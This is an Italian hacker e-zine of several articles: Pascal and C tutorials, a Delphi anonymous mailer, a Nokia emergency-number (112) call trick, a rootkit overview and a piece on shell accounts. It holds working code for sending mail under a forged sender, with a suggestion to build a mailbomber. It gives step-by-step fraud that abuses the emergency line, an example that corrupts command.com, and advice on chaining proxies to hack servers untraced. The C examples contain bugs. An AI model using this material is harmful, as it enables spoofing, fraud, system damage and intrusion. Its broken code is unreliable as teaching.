Esse possono essere di tre tipi: SEQUENZIALE, CONDIZIONALE o ITERATIVA.
Se facciamo un programma come questo:
begin
writeln('inserisci un numero');
readln(n);
q:=sqr(n);
writeln('Il suo quadrato è ',q);
end.
avremmo una struttura di tipo SEQUENZIALE, ovvero quando tutti i comandi vengono eseguiti in un ordine prestabilito, uno dopo l'altro.
Invece, possiamo metterci delle condizioni, mediante l'uso della coppia IF...THEN.
In questo modo, se si verificano le condizioni indicate dopo IF, si prosegue a eseguire i comandi dopo il THEN. Nel caso volessimo far eseguire dei comandi quando la condizione NON SI VERIFICA, dopo il codice che segue il THEN, inseriamo la parola ELSE, seguita dai comandi da eseguire.
NOTA: Nel caso ci sia più di una istruzione da eseguire, bisogna determinale l'area di programma da eseguire nel caso la condizione diventasse vera, usando BEGIN e END, come se fosse una piccola procedura. Inoltre, bisogna notare che END, in questo caso, dev'essere seguito dal punto e virgola (;).
Procediamo con un esempio.
begin
writeln('Inserisci un numero');
readln(n);
IF n>0 THEN
BEGIN
rad:=sqrt(n);
writeln('la radice del numero immesso è ',rad);
END;
ELSE
writeln('Errore');
end.
E questa era la struttura CONDIZIONALE.
Un altro tipo di struttura è quella ITERATIVA, ovvero a cicli. Un ciclo è una situazione in cui è necessario eseguire più di una volta un certo codice, fino al raggiungimento di una condizione che fa uscire il programma dal ciclo.
Ci sono diversi tipi di cicli, i più famosi sono REPEAT...UNTIL, FOR.... DO, e WHILE...DO.
Esaminiamo prima il ciclo WHILE.
la sintassi è
WHILE condizione DO comandi
I comandi, se più di uno, devono essere delimitati da BEGIN e END (seguito dal ";").
Il ciclo continua finchè la condizione è vera, e quando è falsa ne esce, continuando il programma.
Di solito, si usa una variabile CONTATORE, che si incrementa ogni volta che si esegue il ciclo, e la condizione riguarda proprio questa variabile.
Ma c'è un modo per evitare di incrementare il contatore... il ciclo FOR.
Ha quasi la stessa sintassi del ciclo WHILE, solo che essa incrementa automaticamente il contatore ogni volta che il ciclo si ripete, e quando viene richiamato, lo azzera.
FOR condizione iniziale TO condizione di uscita DO comandi
Come while, for esce dal ciclo quando la condizione è falsa.
In questi due tipi di cicli, il controllo è posto ALL'INIZIO, per cui, se il programma non soddisfa le condizioni all'inizio del ciclo, esso non viene eseguito.
Tuttavia c'è un modo per garantire che il ciclo sia eseguito almeno una volta: il ciclo REPEAT.
La sua sintassi è
REPEAT
comandi
UNTIL condizione
In questo caso i comandi non devono essere definiti con la coppia BEGIN/END, e si esce dal ciclo quando la condizione è FALSA, per cui continua a girare finchè risulta vera.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
COMANDI DI INPUT E OUTPUT
Questo è un argomento molto importante della programmazione, ovvero il voler interagire con l'utente.
Cosa significano le parole INPUT e OUTPUT?
L'input è l'inserimento di caratteri (o meglio, di dati) nella macchina, l'OUTPUT è, al contrario, la visualizzazione.
Per far visualizzare sul monitor un messaggio di output, bisogna utilizzare il comando WRITE, che però, dopo aver scritto ciò per cui è stato richiamato, non va a capo. Io preferisco usare il comando WRITELN che, una volta visualizzato un messaggio, torna a capo.
Per utilizzare questi due comandi, c'è bisogno di rispettare una grammatica specifica. Ad esempio:
WRITELN('Questo è un messaggio a video');
Notiamo che il testo è racchiuso da apici e da parentesi (dato che è una STRINGA, ovvero un insieme di caratteri alfanumerici, dev'essere racchiuso da apici).
Nel caso volessimo visualizzare il contenuto di una variabile, possiamo utilizzare la seguente sintassi:
writeln('La variabile A vale ',a);
Dato che a non è una stringa ma una variabile, l'apice si ferma prima, e per far capire al compilatore che non si tratta più di testo, utilizziamo una virgola.
Il prossimo esempio spiegherà come comportarsi nel caso delle visualizzazione di due o più variabili.
writeln('La somma di ',a,' e ',b,' è ',somma);
Il secondo comando da analizzare è READLN.
La sua sintassi è simile a quella di WRITELN
READLN(variabile);
solo che, tra le parentesi non è racchiusa una stringa, ma bensì una variabile, per cui non bisogna mettere degli apici.
Se si volesse inserire più di una variabile, si userebbe
readln(a,b,c);
separando i nomi delle variabili con una virgola. Quando andremo a leggere i diversi valori, possiamo separarli con uno spazio o con un invio.
La sintassi dei corrispettivi comandi WRITE e READ è la stessa, solo che dopo la loro esecuzione, il cursore non viene portato a capo.
[Saluti:]
Ulisses1, Faladi, Cookbooker, Ynsane, Elena, Elisa, Angela, Francesco M. e suo fratello P.,
Antonio C., Michele A., B-stuta, Knera, tutta la mia classe e la mia scuola (grazie per aver
aggiornato il sito!!!), e tutti quelli che mi conoscono in chat e in realtà (tranne Rap e
Th3v3n1n ehehehhe).
EVILANGEL
···············································································
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
__ o __| __ __ | __
(__| (__(_ | (__| (__( (__( |_, (___
__/
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
"Guida Al C"
[Autore: FeltonSpray]
Ciao a tutti e grazie di leggere questo TUTORIAL, io conosco basilarmente diversi
linguaggi ma secondo me quello in cui riesco meglio e il C sopratutto usato per
fare dei programmi per linux. Non credo troverete riferimento mai a come creare un
programma specifico per windows sono fatti vostri io vi consiglio di fare tutto per
linux cmq la scelta è vostra... (arrivati al txt dei socket io ve li spiego per linux!)
Come tutti sanno il linux contiene già da se i compilatori per diversi linguaggi
tra cui anche il compilatore GCC che si trova in /usr/bin la sintassi per compilare
un vostro programma con il gcc è la seguente
gcc prognostro.c -o prognostro
così il nostro programma diventa eseguibile e da una shell basta richiamare il percorso
e lanciare il programma! Naturalmente la sintassi che vi ho dato io va bene sè il programma
che avete creato (prognostro.c) lo avete salvato in /usr/bin sennò dovete indicare il
percorso tipo
gcc /root/Desktop/prognostro.c -o prognostro
Io creo i miei programmi con l'editor GEDIT anche se ci sono editor + specifici!!!
Fatta questa piccola parentesi possiamo cominciare a spiegare qualcosa....
Esempio uno!
----------------------------------------------------------------------
#include <stdio.h>
main(){
printf("FeLtOnSpRaY sEi MiTiCo");
}
----------------------------------------------------------------------
Questo è il nostro primo programma che facciamo (non siete già contenti?? ;p)
Adesso spieghiami la struttura del c e quello che abbiamo fatto con il programma:
#include >>--> E' un comando che ordina al programma di includere tipi, strutture e funzioni
di una libreria! [ il simbolo # serve ad inizializzare la richiesta al processore]
<stdio.h> >>--> Questa è la libreria che serve a noi per far funzionare il programma, c'e ne
sono tantissime man mano che continuerò questo corso ve le spiego almeno
le più importanti; notare che le librerie vanno scritte in mezzo a < >
main(){ >>--> E la dichiarazione della procedura principale del programma, adesso le parentesi
sono vuote, man mano che che andiamo avanti vi spiego come riempirle
printf("scritta"); >>--> Serve a far scrivere nel monitor la scritta che abbiamo inserito
nelle parentesi, questa funzione printf la possiamo usare inquanto
abbiamo inserito come direttiva al preocessore la libreria stdio.h
che si occupa pure della gestione INPUT & OUTPUT del programma.
Notate che l'istruzione printf........ chiude con un ; infatti in c tutte le istruzioni che
mettiamo dopo il main(){ vanno dichiarate con il ; è un errore non metterlo il programma non
si compilerà mai!
Alla fine di tutte le istruzioni per chiudere il programma mettiamo }
/* Adesso spero vi è tutto chiaro l'esempio, che state capendo qualcosa di c sò che non
sò usare termini perfetti e me ne scuso ma io ve lo spiego così se vi va bene tanto
meglio sennò consiglio di scaricare qualche guida di 300 pagine molta più completa ma
pur sempre difficile! */
Adesso voi direte ma sto scemo che ci scrive?? Ho scritto un mio commento ed anche con il
C accanto ad ogni comando che date potete mettere un commento per far capire meglio il
programma, la sintassi per mettere un commento è questa:
/* scrivi tutto quello che vuoiappena finisci chiudi il commento con */
Naturalmente il commento si vede nel codice e non nel programma!
Adesso andiamo avanti e vi spiego quanto il printf sia flessibile:
\n >>--> Crea una nuova linea
\r >>--> Va a capo
\t >>--> Inserisce un tab
Sicuramente c'e ne sono altre ma io non le sò =)
allora vi spiego come applicarli, prendiamo l'esempio di prima:
printf("FeLtOnSpRaY sEi MiTiCo");
allora se io scrivevo così:
printf("\n\rFeLtOnSpRaY sEi MiTiCo\n\r");
Il programma scrive la scritta FeLtOnSpRaY sEi MiTiCo =) in una nuova riga a capo,
provate le varie combinazioni così imparate a sistemare una scritta nel programma
per renderlo più professionale =)
Adesso spieghiamo quali varibili si possono impostare, quanto c'e ne sono, e come
applicarli!
Esistono 5 tipi di vartibili:
char >>--> Un carattere
int >>--> da -32767 a 32767
long >>--> da -2147483647 a 2147483647
float >>--> da 3,4 * (10**-38) a 3,4 * (10**+38)
double >>--> da 1,7 * (10**-308) a 1,7 * (10**+308)
Allora visto che adesso le conosciamo vediamo come applicarne qualcuna:
--------------------------------------------------------
#include <stdio.h>
main(){
int numero;
numero=1;
printf("FeLtOnSpRaY è il numero %d ;p", numero);
}
--------------------------------------------------------
Credo che abbiate già capito tutto ma per i più "DURI DI TESTA" la spiego:
int numero; >>--> Dichiariamo al programma che esiste una variabile di nome numero!
numero=1; >>--> Dichiariamo che il numero della variabile è 1
printf("FeLtOnSpRaY è il numero %d", numero); >>--> Trovate di nuovo %d che è il richiamo dove va a finire
il numero da noi dichiarato nella variabile. e trovate
, numero che lo dovete mettere col nome che avete dato
alla variabile, se mettete il nome alla variabile shock
dovevate scrivere shock=1; e printf....... , shock);
/* Spero di essere stato chiaro è comunque non fate commenti del tipo MA SE CI SCRIVEVI 1 NELLA
PRINTF NON RISPARMIAVI TEMPO??? E VOI COME CAPITE SENNO' LE VARIABILI??? =) */
Ok Adesso possiamo parlare di un'altra opzione utilissima del stdio.h parliamo del scanf...
piccola spiegaziuone prima dell'esempio:
Lo scanf gestisce l'input da tastiera lo immagazina e lo stampa nel nostro caso nel printf ma
meglio fare un esempio banale:
---------------------------------------------------
#include <stdio.h>
main(){
char numero;
printf("\n\rDIGITA UN NUMERO:\n\r");
scanf("%d",&numero);
printf("\n\rHAI INSERITO IL NUMERO %d\n\r")
---------------------------------------------------
In base a ciò che vi ho spiegato capirete subito sto prog come funziona ma io penso sempre
ai duri di comprendonio e lo spiego =)
char numero; >>--> Impostiamo come variabile la char che è quella dedicata alle lettere =)
scanf..... >>--> aspetta il vostro input da tastiera e lo passa all'ultimo printf
Penso che più facile di cosi c'e questo:
------------------------------------------------------------------------------------------------
#include <cambiatehobby.h>
mail(){
printf("FeLtOnSpRaY vi consiglia di andare a puntare soldi sui cavalli magari vincete\n\r");
}
------------------------------------------------------------------------------------------------
/* naturalmento scherzo hihihi */
Adesso spieghiamo che è un ARRAY =)
Un array è una variabile che può contenere in essa diverse variabili
Per creare un array non ci vuole niente allora:
int numero[30] >>--> /* Naturalmente 30 è il numero di variabili che io voglio che contenga */
numero[0]=1 }
numero[1]=2 } >>--> I valori non sono da seguire come li ho scritti io li potete benissimo cambiare!
numero[2]=3 }
e così via!
Ricordate che se ne metto 30 di variabili si conta da "0" a "29"
________________________________________________________________________________________________
Esistono 4 tipi di cicli:
If
While
Do
For
(Ricordate che se non si fanno modifiche per cambiare una condizione, si originano cicli
infiniti quindi ehehh state attenti =)
Ma andiamo ad analizzarli uno per uno... /* che palle =) */
Allora un ciclo su imposta come if quando deve verificarsi un'operazione che se riesce
ci da "errore 0" invece se non riesce ci da "errore 1" ma un esempio si deve fare senno
manco io che sto scrivendo ci capirei qualcosa:
if (numero>5) printf("Maria ha fatto più di 5 bocchini");
Se il numero è maggiore di 5 ci comparirà la scritta altrimenti non ci compare niente, se è
maggiore di 5 ci restituisce un "errore 0" altrimenti ci restituisce un "errore 1" adesso
invece faccio un esempio in modo tale che ci risponda sia se il numero dei "bocchini" è
maggiore, sia che il numero è minore allora...
-----------------------------------------------------------------
if (numero>5){
printf("Maria ha fatto più di 5 bocchini WOW!!");
}
else {
printf("Maria ha fatto meno di 5 bocchini...");
}
-----------------------------------------------------------------
Allora vi spiego l'esempio (per i duri di testa) =) allora....
Nello stesso programma abbiamo fatto + di un'operazione come vedete, invece "else"
server come istruzione all'if per far capire che deve fare se l'operazione non
avviene; nel nostro caso ci restituisce una scritta.
Adesso passiamo al ciclo While...
E preciso identico a quello di prima soltanto che la condizione resta fino a che e vera
while (numero<5){ >>--> Così diventa per il ciclo while
Ricordate che il ciclo while controlla alla partenza le operazioni, /* così introduco il ciclo Do */
Il ciclo è uguale a quello while soltanto che a sua volta questo ciclo controlla alla fine
le operazioni, ekko un esempio:
do {
operazioni
numero++;
} while(numero<10);
Ok adesso resta il For..
Il for non fa altro che controllare un numero di operazioni ogni tot di volte, la sintassi
è:
for (numero=0; numero<5; numero++){
operazioni
}
un esempio che chiarisce le idee
-------------------------------------------
#include <stdio.h>
main(){
int felton;
for (felton=0;felton<5;felton++){
printf("La variabile vale %d",felton);
}
}
--------------------------------------------
Se ancora non lo avete capito vi consiglio di compilarlo subito e capire come funziona!
Ultimi due comandi prima di chiudere con i cicli ekko due comandi importanti "break & continue"
Break >>--> chiude un ciclo in ogni momento
continue >>--> lo fa ricominciare nuovamente
|\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\|
In teoriapotre chiudere qui il txt visto che ho spiegato le varibili ma visto che non ho nient'altro da fare
vi rompo ancora le palle con le "strutture" in c :
Allora una struttura è capace di contenere al suo interno diverse variabili anche non uguali, allora adesso
facciamo una struttura in grado di contenere info sulle moto come Nome, Marca, Peso, capacità serbatoio:
quindi:
-----------------------------------------------
struct moto{
char nome;
char marca;
int peso;
int serbatoio;
}
Adesso creiamo la variabile vera e propia
struct moto moto1;
struct moto moto2;
struct moto moto3;
struct moto moto4;
Adesso
moto1.peso=107;
moto1.serbatoio=12;
strcpy(moto1.nome,"RUNNER");
strcpy(moto1.marca,"GILERA");
moto2.peso=84;
moto2.serbatoio=5;
strcpy(moto2.nome,"Zip Sp");
strcpy(moto2.marca,"Piaggio");
moto3.peso=90;
moto3.serbatoio=8;
strcpy(moto3.nome,"Nrg Extrem");
strcpy(moto3.marca,"Piaggio");
moto4.peso=140;
moto4.serbatoio=12;
strcpy(moto4.nome,"Leonardo");
strcpy(moto4.marca,"Aprilia");
--------------------------------------------------
Gestiamo i file con i nostri programmi...
Prima di tutto bisogna creare un puntatore capace di accettare FILE e si crea così
FILE *nomedelfile;
Dopo dobbiamo aprire questo file è la sintassi è:
nomedelfile=fopen("\\provola.txt","a");
Spieghiamo un pò il tutto
nomedelfile >>--> come avete scritto nel puntatore deve essere uguale!
fopen >-->> è il comando che fà aprire il file
("\\provola.txt >>--> il file che vogliamo aprire
,"a"); >>--> Quella a sta per a significare che nel file noi vogliamo che aggiunga delle
modifiche senza toccare il file (tipo come i file di log vogliamo che ci
scriva ma non che cancelli file|)
Adesso vi dico le opzioni che sò:
a >>--> Già spiegata sù
r >>--> Legge il file in questione
w >>--> Crea il file (se già non esiste) e ne cambia sempre i contenuti con quello che vogliamo!
Forse c'e ne saranno altri ma io non li sò :)
(Ricordate che li potete combinare i comandi tipo mettere "aw" oppure "arw")
Naturalmente alla fine dobbiamo chiudere il file sennò le modifiche non vengono accettate
quindi dobbiamo scrivere alla fine
fclose(nomedelfile);
Esempio contro i fottuti WINDOWSIANI !!!!!!
---------------------------------------------------
#include <stdio.h>
main(){
FILE *nomedelfile;
ilfile = fopen("\\command.com","a");
fprintf(nomedelfile,"%s","A MORTE I LAMER!");
fclose(nomedelfile);
}
---------------------------------------------------
Di nuovo trovate solo il comando "fprintf" che serve per inserire delle frasi sul file!
|\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\|
Adesso spigherò le COSTANTI >>--> Fate attenzione a questa parte!!!!!!
Le costanti possono essere numeriche intere, di unsa stringa o di un carattere; e come dice
la parola stessa rimangono costanti per tutto il programma!
non c'e bisogno che metta la spiegazione vi dico solo la sintatti esatta per usarle:
static char ciao 4 []="FeLtOnSpRaY";
|---------------------------------------> Comando nuovo e serve a far capire che stiamo
usando una costante statica!
Adesso Parliamo dei puntatori:
I puntatori non sono altro che delle variabili che ha un'esatta collocazione in memoria!
ricordate che un puntatore deve essere allocato in una zona di memoria, sennò il pc va in crash all'esecuzione del programma!
per creare un puntatore basta scrivere questa sintassi:
int *puntatore
|-------------->Int può essere sostituito a qualsiasi altra variabile!
Possiamo dire che i puntatori hanno tre tipi di informazioni:
puntatore >>--> che mi indica il valore, il contenuto della variabile (considero il puntatore come una qualsiasi variabile)
&puntatore >>--> che è l'indirizzo fisico della variabile all'interno della memoria
puntatore >>--> che mi indica il contenuto della locazione della memoria.
|\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\|
Adesso spiego un'altra cosa del C che mi auguro conosciato con sistemi .NIX la REDIREZIONE.
> Inserisce l'esecuzione di un programma in un file particolare da noi scelto.
< Inserisce dentro un programma ciò che è scritto in un file.
| Prende l'output da un programma e lo immette come input in un altro.
Tutto questo per introdurre il comando getchar() e putchar().
Queste due librerie si usano così:
int getchar(void);
int putchar(char ch);
Il primo comando legge un char, mentre il secondo scrive un char.
Adesso infine vi spiego il DEFINE
#DEFINE.
Il programma #define serve per creare mini programmini o macro dentro un programma. Serve quindi a
semplificare il nostro lavoro e poter anche leggere il sorgente in modo chiaro!
La sintassi esatte è
#define <macro> <operazione>
Adesso ho finito la parte 1 di questo Tutorial mi raccomando di studiarlo per bene e di
provare i miei esempio così prendete pratica! La prossima volta spiegherò i SOCKET!
[]---[FeLtOnSpRaY]---[]
[]---[ feltonspray@katamail.com ]---[]
P.S= Il C è il linguaggio preferito dagli Hacker (N.d.R. pensa per te :P) visto le sue
potenzialità e la sua semplicità quindi imparare necessariamente questo linguaggio perchè
gli exploit che esistono per entrare nei server sono creati in C e dovete compilarli anche
nella macchina vittima quindi due cose: Installatevi Linux e smanettate come i pazzi,
imparate il C, Levatevi il virus che avete nel
pc si chiama WINDOWS!!!!!!!
·····························································································
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
__ __ __ __ __ __ __ o | ___ __ o __ __| ___ | __ |__ o
(__( | ) (__) | ) (__| | ) ) (__( | |_, (__/_ | ' | | ) (__| (__/_ |_, |__) | ) |
| |
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
[Titolo: Realizzare un anonymailer kon Delphi]
[Autore: Cookbooker]
[Tempo "sprekato" a skrivere sto artikolo: mezzoretta]
[Obbiettivo: realizzare un anonymailer utilizzando il compomente NMSMTP di Delphi]
Realizzare un anonymailer kon Delphi è molto semplice, negli allegati ne trovate un esempio kompleto
di codice sorgente, ma vediamo passo per passo kome realizzarne uno da zero.
Prima di tutto inserite 4 edit (uno per indikare il falso mittente, uno per indikare
il ricevente, uno per specifikare il server da utilizzare ed uno per specificare l'oggetto), 2
pulsanti (uno per konnetterci al server e l'altro per inviare l'e-mail), un Memo (ke conterrà il corpo del messaggio) ed infine
aggiungete un componente NMSMTP (FastNet/NMSMTP) ke sarà fondamentale per l'invio dell'e-mail.
Ora personalizziamo il pulsante Button2 (il pulsante ke avvierà il collegamento al server) in
questo modo:
//userò questo karattere per distinguere il codice dai kommenti;
o/ o/
``````````````````°\``````````````````````````````````````°\`````````````````````````
procedure TForm1.Button2Click(Sender: TObject);
begin
NMSMTP1.Host := Edi4.text; //qui indikiamo kome server il server specifikato in Edit4
NMSMTP1.Connect; //con questo komando ci connettiamo al server precedentemente specificato
end;
o/ o/
``````````````````°\``````````````````````````````````````°\`````````````````````````
Una volta kollegati al server usando i comandi specificati nella procedura precedente, non ci
rimane ke specifikare i dati necessari all'invio dell'e-mail:
o/ o/
``````````````````°\``````````````````````````````````````°\`````````````````````````
procedure TForm1.Button1Click(Sender: TObject);
begin
NMSMTP1.PostMessage.FromAddress := Edit2.Text; //indikiamo al server l'apparente indirizzo del mittente
NMSMTP1.PostMessage.Subject := Edit3.Text; //specifikiamo il "soggetto" della lettera
NMSMTP1.PostMessage.ToAddress.Add(Edit1.Text); //l'indirizzo del ricevente è quello specifikato nella casella di testo Edit1
NMSMTP1.PostMessage.Body.Assign(Memomsg.Lines); //il corpo del messaggio è contenuto nel Memomsg
NMSMTP1.SendMail; //infine inviamo tutti i dati specificati, e-mail kompresa :o)
end;
o/ o/
``````````````````°\``````````````````````````````````````°\`````````````````````````
Semplice, no? :o) Naturalmente questo è un anonymailer essenziale, kon un po di inventiva
potete perfezionarlo molto: potete trasformarlo in un mailbomber :) o potete semplicemente
utilizzare il componente NMSMTP per kreare un programma utilizzabile per la gestione di una
mailing list... insomma ora avete kualkosa da fare mentre aspettate il mio prossimo artikolo su
Delphi ke, a mio parere, sarà molto interessante... sarà, infatti, una vera e propria guida alla
creazione di una backdoor 4 dummies :o))
ßyeZ, Cookbooker.
Saluti: saluto e ringrazio Ulisses1, Rhost, Cujo, Archimede, Freesto, EvilAngel, Fabripal tutti
i membri della crew , Nube, Rage, Messiah e Fulmine (ke nick del cazzo.. non potevi scegliertente
uno un po più dignitoso? :P).
__________________________________________________________________________
| _____ _ _ _____ _____ ___ _ _ _ __ _ _____ |
| | _ \ | | | | | _ \ | ____| / | | | / / | | | \ | | / ___| |
| | |_| | | |_| | | |_| | | |__ / /| | | |/ / | | | \| | | | |
| | ___/ | _ | | _ / | __| / / | | | |\ \ | | | |\ | | | _ |
| | | | | | | | | \ \ | |___ / / | | | | \ \ | | | | \ | | |_| | |
| |_| |_| |_| |_| \_\ |_____| /_/ |_| |_| \_\ |_| |_| \_| \_____/ |
--------------------------------------------------------------------------
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
_ __
_|_ __ _|_ _|_ o __ __ __ __ o | '| '| __)
| (__) |_, |_, | (__( | ) ) (__) | |_, | | (___
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
"FoTTiaMO IL 112"
[Autore: FeltonSpray]
Sicuramente tutto il mondo hhih anzi tutta l'italia ha sentito parlare di questo bug
scovato nei telefonini nokia, a me lo ha spiegato una compagna di classe.... che è stata
anche denunciata..... beh prima un DISCLAIMER CON LE @@
DISCLAIMER
Ragazzi non usatelo cone la vostra scheda OMNITEL*, se lo fate verrete denunciati dalla
polizia stessa visto che il bug..... beh IO VI HO AVVERTITO AZZI VOSTRI!
Provato con NOKIA 3210 CREDO CHE SOLO IN QUESTO FUNZI!
SCHEDA OMNITEL A ZERO LIRE DI CREDITO!
InIzIaMo
Allora le cose da fare sono semplicissime: Premetto che si può fare solo con le schede
OMNITEL provato anche con le altre ma non và :-( cmq disabilitate il PIN iniziale, andate
su MESSAGGI >>--> IMPOSTA NUMERO CASELLA VOCALE e scrivete il numero che volete chiamare!
RICORDATEVI CHE NELLA SCHEDA BISOGNO CHE SIA A ZERO SENZA NA LIRA!!! Adesso telefonate al
numero 112 avviata la chiamata SPEGNETE E RIACCENDETE velocemente il telefonino schiacciando
il tasto 1, dopo un paio di prove ci prendete la mano! Adesso vedrete che la telefonata viene
innoltrata ma non compare il LOGO sul DISPLAY del Telefonino che chiama questà è la conferma
dell'avvenuta connessione perfetta; adesso parlate pure quanto cavolo vi pare MA RICORDATE
CHE VE LA METTETE DI DIETRO DA SOLI VISTO CHE VERRETE DENUNCIATI SE USATE LA SCHEDA VOSTRA...
Beh questo pikkolo tutorial svolge al termine, vi ringrazio di leggermi ancora! E spero di
avervi portato un nuovo trucchetto per quelli che non lo sapevano! ciao Ciao alla prossima!
[]---[FeLtOnSpRaY]---[]
[]---[ feltonspray@katamail.com ]---[]
p.s. thanks Stefania per avermelo spiegato!
P.S thanks Feltonspray Per averglielo spiegato a STEFANIA HIHIHI =)
ByZzZZZZZzzzZZZZzZZZzZZzZZZzZZzzzZZZZZzzZZZZZZzZZZZzZZzZzzzzzZZzzZZZZZZzZZZZZZzzZZzzzzzzzZZZZzzzzzZ
_______________________________________________________________________________________
| _ _ __ _ _ _ __ __ _____ _ _ __ _ _ __ __ |
| | | | | | \ | | | | | | \ \ / / | ____| | | | | | \ | | | | \ \ / / |
| | | | | | \| | | | | | \ \/ / | |__ | | | | | \| | | | \ \/ / |
| | | | | | |\ | | | | | } { | __| | | | | | |\ | | | } { |
| | |___ | | | | \ | | |_| | / /\ \ | |___ | |_| | | | \ | | | / /\ \ |
| |_____| |_| |_| \_| \_____/ /_/ \_\ |_____| \_____/ |_| \_| |_| /_/ \_\ |
---------------------------------------------------------------------------------------
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
| |__, __ __
|_, | \ | ) )
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
[Titolo: LOADABLE KERNELMODULE ]
[Autore: Ulisses1]
Disclaimer: Raga sono stato 3 mesi senza problemi e non ne voglio proprio adesso.
Gentilmente cercate di non fare stronzate con il materiale contenuto in questo articolo.
Sottolineo che questo articolo è stato scritto esclusivamente a scopo educativo.
Nel caso in cui verrete beccati vi prego di non fare il mio nome o quello dei miei collaboratori.
Grazie e Buona Giornata :)
Bene dopo il disclaimer possiamo iniziare.
Gli lkm (Loadable kernel module) possono essere uno strumento molto potente nelle mani di un
hacker o cracker che abbia ottenuto accesso root ad un sistema.
Per poter capire il funzionamento degli lkm bisogna avere chiaro il concetto di dirottamento
delle chiamate di sistema .
Immaginiamo di avere al posto del vecchio indirizzo nellarray sys_call_table() un nuovo che
punta alla nostra funzione in grado di filtrare i paramentri della chiamata C prima che siano
passati, oppure una funzione che sia capace di modificare i dati ritornati in zona utente.
In questo modo se non vogliamo che ladmin non veda e non senta i rumori da noi provocati,
ebbene non sentirà e non vedrà nulla.
Ma come è possibile disporre di un simile potere?
Beh in UNIX e in Linux, a meno di usare Capabilities, il root è onnipotente. In zona kernel
inoltre non vi è concetto di permessi, ogni codice viene eseguito al massimo dei privilegi.
Senza dubbio per poter utilizzare degli lkm bisogna avere a disposizione molti tools ed exploits
nonché una buona conoscenza del kernel per poter creare un rootkit ad hoc nel kernel.
Ma ora vediamo come sia possibile nascondere files mediante questa tecnica.
Il comando strace permette di tracciare le chiamate di sistema ed i segnali utilizzati da
unapplicazione. In questo caso utilizzando questo comando su un banale ls mostrerà le varie
chiamate utilizzate.
Di sicuro la più importante nelloutput di strace risulta essere getdents . Quasi in tutti i
rootkit via lkm sono disponibili versioni modificate della kiamata sys_getdents() che filtrino
i vari nomi file nel caso questi contangano una determinata stringa nel nome.
Un altro approccio possibile via lkm permette di registrare, ad esempio, un nuovo protocol
handler, ovvero una nuova funzione o un set di funzioni per manipolare e gestire traffico in
rete. In questo modo è possibile modificare il normale funzionamento dello stack TCP/IP di Linux,
occultare uno sniffer nel kernel, o magari un bouncer.
In teoria è sufficiente lanciare il comando lsmod per ottenere una lista di moduli caricati.
In realtà sfuggire ad un simile controllo è molto semplice. Sotto Linux vi è una lista dei nomi
dei moduli caricati, le dimensioni, reference ed i moduli che li utilizzano a loro volta in
/proc/modules . Se un modulo è presente in questa lista ma non nelloutput di lsmod, cè qualcosa
che non va. Se non compare nemmeno qui è possibile che lo stesso lkm impedisca di essere visto in
/proc/modules . In questo caso i problemi si complicano. Esistono altri metodi per trovare un lkm
ma... sono riportati in dei bei manuali quindi è inutile che io li spieghi in questo articoletto..=)
Beh larticolo è finito, spero che vi sia piaciuto... ByEz
Ulisses1
···············································································
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
| ___ __ |__ ___ | |
|_, (__/_ __) | ) (__/_ |_, |_,
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
[Titolo: Le Shell]
[Autore: FeltonSpray]
"DiScLaImEr"
Niente DiscLaimer tutte info =)
Oggi vi spiegherò un pò perche è utile avere shell e che servono, che si può fare
etcc.etcc.etcc.
Allora le shell sono dei pikkoli accessi su sistemi .Nix che ci permettono di
fare diverse operazioni, invece per chi si stà avvicinando da poco all'hacking
è consigliabile registrarsi subito per capire un pò come ci si muove in linux
prima naturalmente di installarlo. Esistono diversi server che offrono shell
gratuite e alla fine di questo txt scriverò degli URL dove potersi registrare.
Iniziamo subito a parlare delle diverse shell che si trovano gratis, esse vengono
chiamate shell-ristrette visto che sono limitate a certi usi per esempio quasi tutte
quelle free non permettono l'uso di BOT se ne trovano uno viene immediatamente chiuso
il servizio ed eliminato il nostro account su quel server ciò significa niente SHELL :-(
allora dopo esserci registrati ed essere dentro il nostro account ci troviamo sul server
che ci mette a disposizione certi servizi come quello di FTP,LINX, un paio di mego di
spazio gratuito ed altri servizi; noi possiamo tranquillamente usare (per i comandi
nel sito http://spazioweb.inwind.it/inkrew/ troverete il mio TXT che ne parla) adesso
cominciate a prendere pratica. Naturalmente per noi le shell non servono ad allenarci
su linux ma a ben altri scopi =) tipo per fare un hack ci colleghiamo alla shell
gli mandiamo via ftp gli exploit che ci servono e cominciamo ad hackere ma PURTROPPO
NON E COS'I visto che il server della shell possiede il nostro ip e il server vittima
conosce quello della shell non ci metteranno tanto a risalira a voi quindi io vi consiglio
di usare qualche proxy in catena per poi arrivare alla shell e dalla shell collegarci via
telnet alla stessa shell, così alla shell all'inizio appare il suo ip connesso eheheh
e quindi potrete hackerare un po più tranquilli ma se prendete di mira server come NASA
state sicuri che vi trovano anche con 50 proxy incatenati =) Ma adesso mi sa che siamo
usciti fuori dal DISCLAIMER, ricordate solo di hackare i vostri sistemi non quelli di altri
server.
Esistono anche le shell non ristrette che sono le shell a pagamento, queste sono notevolmente
migliori, potete anche metterci su BOT, e avete tutti i servizi del server disponibili beh
con i soldi si ha tutto ehehe. Onestamente io consiglio di comprarvene una magari che il server
